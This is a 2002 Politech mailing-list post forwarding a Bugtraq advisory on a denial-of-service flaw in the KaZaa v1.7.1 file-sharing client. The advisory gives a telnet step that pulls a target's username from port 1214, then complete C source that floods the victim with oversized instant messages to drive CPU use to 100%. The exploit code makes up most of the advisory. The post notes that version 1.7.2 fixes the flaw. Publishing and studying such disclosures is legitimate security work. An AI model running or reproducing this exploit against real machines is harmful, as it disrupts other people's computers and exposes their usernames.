FC: Just in time for P2P-hacking bill: Disrupting KaZaa clients

[Declan McCullagh <declan () well com>]

Previous Politech message:

"Peer-to-peer hacking bill officially introduced in House"
http://www.politechbot.com/p-03795.html

---

From: "Richard M. Smith" <rms () computerbytesman com>
To: <declan () well com>
Subject: Just in time for the Berman bill!
Date: Thu, 25 Jul 2002 20:46:38 -0400


FYI:

-----Original Message-----
From: josh () pulltheplug com [mailto:josh () pulltheplug com]
Sent: Thursday, July 25, 2002 1:58 AM
To: bugtraq () securityfocus com
Subject: KaZaa v1.7.1 Denial of Service Attack


Submitted by  : Josh (josh () pulltheplug com), omega
                (mtwoar () hotmail com) on July 25th, 2002
Vulnerability : KaZaa Denial of Service Attack
Tested On     : KaZaa v1.7.1
Remote        : Yes
Fix           : KaZaa v1.7.2 has been released and is a fix for the
                problem
Big Thanks To : SooT for letting me crash your system a lot.
Greets to     : SooT, zen-parse, arcanum, lockdown, brian, Bryan S.,
#social on ptp, Jade

        There exists a denial of service attack in KaZaa Media Desktop
file sharing utility
that allows an attacker to force CPU usage to rise to 100% upon sending
large messages to
the victim.  Basically it seems to have the same effect as opening an
exceptionally large
text file in some text editor.  The added bonus is the decryption that
is performed on the
message, which adds to the CPU usage.
        Exploitation merely requires the I.P. of the victim and a
username.  The username
can be obtained as such:

$ telnet <ip> 1214
Trying <ip>...
Connected to <ip>.
Escape character is '^]'.
GET / HTTP/1.1                                 // My input

HTTP/1.0 404 Not Found                         // Server output
X-Kazaa-Username: <the user name of the user>
X-Kazaa-Network: KaZaA
X-Kazaa-IP: <the_ip_you_typed>:1214
X-Kazaa-SupernodeIP: <censored>:1214

Connection closed by foreign host.

Assuming you and the receiving user have the bandwidth to transmit and
receive the message
before the connection to the user's kazaa server times out, a good proof
of concept length
is 20 messages at 100 iterations of the 4026 byte message tell... 300
iterations 20 times
will make it pretty evident.

/*
   kazaa denial of service attack
   by Josh and omega
*/

#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <errno.h>
#include <string.h>
#include <netdb.h>
#include <sys/types.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <stdarg.h>

#define PORT 1214


int main(int argc, char *argv[])
{
   int fd, numbytes, randnum, k;
   struct hostent *host;
   struct sockaddr_in them;
   char buf2[4026];
   char buf[5000];
   char *bigboy;
   int i, size, j;


   memset(buf2, 'a', sizeof(buf2));
   buf2[sizeof(buf2)-1]='\0';
   srand(time(NULL));

   if (argc < 5)
   {
      fprintf(stderr,"usage: %s <hostname> <(this*4026) bytes per
message> <username_of_target> <number_of_messages>\n", argv[0]);
      exit(1);
   }
   if ((host=gethostbyname(argv[1])) == NULL)
   {
      perror("gethostbyname");
      exit(1);
   }

   them.sin_family = AF_INET;
   them.sin_port = htons(PORT);
   them.sin_addr = *((struct in_addr *)host->h_addr);
   memset(&(them.sin_zero), '\0', 8);


   size=(4042*atoi(argv[2]))+280+1;
   bigboy=(char *)malloc(size);

   snprintf(bigboy, size, "GET /.message HTTP/1.1\nHost:
68.10.112.148:1214\nUserAgent: KazaaClient Jan 18 2002
18:53:21\nX-Kazaa-Username: 31337h4x0r\nX-Kazaa-Network:
KaZaA\nX-Kazaa-IP: %d:1214\nX-Kazaa-SupernodeIP: %d:1214\nConnection:
open\nX-Kazaa-IMTo: %s@KaZaA\nX-Kazaa-IMType: user_text\n", randnum,
randnum, argv[3]);

   /* the msg appears as one msg to the receiver, but comes in intervals
of 4096 bytes... */
   snprintf(buf, sizeof(buf), "X-Kazaa-IMData: %s\n", buf2);
   for(k=0;k<atoi(argv[2]);k++)
   {
      strcat(bigboy, buf);
      k++;
   }
   strcat(bigboy, "\r\n\r\n\r\n\r\n\r\n");

   fprintf(stdout, "done preparing packet... sending\n");
   for(i=0, k=0;i<atoi(argv[4]);i++)
   {
     if ((fd = socket(AF_INET, SOCK_STREAM, 0)) == -1)
     {
       perror("socket");
     }
     else
     {
       if (connect(fd, (struct sockaddr *)&them,sizeof(struct sockaddr))
== -1)
       {
         perror("connect");
       }
       else
       {
         printf("sending %d message\n", k);
         write(fd, bigboy, strlen(bigboy));
         k++;
         close(fd);
       }
     }
   }
   fprintf(stdout, "\n%d out of %d attempted got through\n", k, i);
   free(bigboy);
   return 0;
}



<Just crap>

Paranoia is simply an optimistic outlook on life.

Organized people are just too lazy to look for stuff.

Killer animals zap animals again in slimey sludge.  People yack when a
root evades.

While observing moths frantically try to enter a light bulb I have been
able to extract and
algorithm to describe their movements.

Fat people are harder to kidnap.

</Just crap>




-------------------------------------------------------------------------
POLITECH -- Declan McCullagh's politics and technology mailing list
You may redistribute this message freely if you include this notice.
To subscribe to Politech: http://www.politechbot.com/info/subscribe.html
This message is archived at http://www.politechbot.com/
Declan McCullagh's photographs are at http://www.mccullagh.org/
-------------------------------------------------------------------------
Like Politech? Make a donation here: http://www.politechbot.com/donate/
-------------------------------------------------------------------------